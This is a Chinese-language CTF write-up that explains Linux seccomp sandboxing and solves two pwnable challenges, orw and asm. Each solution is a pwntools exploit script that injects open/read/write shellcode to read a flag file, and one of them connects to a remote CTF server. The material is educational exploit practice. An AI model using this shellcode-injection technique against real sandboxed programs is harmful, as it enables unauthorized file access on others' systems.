0x00: 简介
沙箱机制,英文sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。
安全计算模式seccomp(Secure Computing Mode)在Linux2.6.10之后引入到kernel的特性,可用其实现一个沙箱环境。使用seccomp模式可以定义系统调用白名单和黑名单。seccomp机制用于限制应用程序可以使用的系统调用,增加系统的安全性。
在ctf中主要通过两种方式实现沙箱机制:
- prctl系统调用;
- seccomp库函数;
0x01: 函数限制检测工具seccomp-tools
安装:
sudo apt install gcc ruby-dev
sudo gem install seccomp-tools
使用:
0x02: 例题实践
Pwnable_orw:
通过checksec可以看出其架构,远程的也是这个。
如果使用shellcraft、asm模块,要配置相对应的架构,可以通过context.binary = “./xxx”自动地完成配置。
用seccomp-tools dump ./orw检查受限函数:
允许的函数主要有open、read、write系统调用函数,用这个函数读取flag。
用32位的IDA打开进行分析:
没有数据段不可执行保护,所以直接往bss里面写shellcode就可以了。通过shellcode写入后,后面第6行就进行执行了。
Exp: from pwn import * context.log_level = "debug" context.binary = "./orw" io = process("./orw") #io = remote("node4.buuoj.cn",27178) bss = 0x804A060 payload = shellcraft.open("flag") payload += shellcraft.read(3,bss + 100, 100) payload += shellcraft.write(1,bss + 100, 100)
io.recvuntil("Give my your shellcode:") io.sendline(asm(payload)) print(io.recv())
Pwnable_asm:
先用checksec工具检查架构和其保护机制,然后使用seccomp-tools工具检查受限制函数(这步是在打开IDA后,看到sandbox函数后进行的)。
从图可以看出,仅被允许的系统调用有:read()、write()、open()和exit()。(这个在IDA的注释里面也有说明~)
用64位IDA打开分析程序:
函数分析:
- 12行用mmap映射了一段0x1000B大小的匿名空间,起始地址为s = 0x41414000;
- 13行将开辟的空间用144进行初始化,144是啥?0x90。根据注释说是用shellcode解法,应该是制作了nop滑梯。
- 15行将stub数组赋给了匿名空间前段,stud是啥?由于ida中该数组的值显示有点零散,所以我就在pwnable网站查看了源代码:stud[46] = “/x48/x31/xc0/x48/x31/xdb/x48/x31/xc9/x48/x31/xd2/x48/x31/xf6/x48/x31/xff/x48”,反汇编:(其实就是清空寄存器,好像不影响写入shellcode)
- 17行接着向后面输入数据,关键点:写入我们想要shellcode进行执行。
- 19行chroot(directory):将该进程的根目录改为directory。可以防止我们找不到远程中的路径,我们直接open(“./flag”)就行。
- 20行sandbox开沙箱机制嘛~
- 21行应该是ida分析有误,源代码是没有参数的:((void (*)(void))s)();就是从s那里开始执行。
分析完程序,已经很明显了,和上一题一样。通过17行写入shellcode,然后21行会进行执行。
Exp: from pwn import * context.log_level = 'debug' context.binary = './asm' #io = process("./asm") io = remote("node4.buuoj.cn",26533) addr = 0x41414000 + 0x100 payload = shellcraft.open("flag") payload += shellcraft.read(3, addr, 0x30) payload += shellcraft.write(1,addr, 0x30) io.recvuntil("give me your x64 shellcode: ") io.sendline(asm(payload)) print(io.recv())
0x03: 最后
初步接触,有些地方没思考得太透。所以,有疑惑的朋友可以在评论区提出,互相交流学习。
tolele
2022-04-25
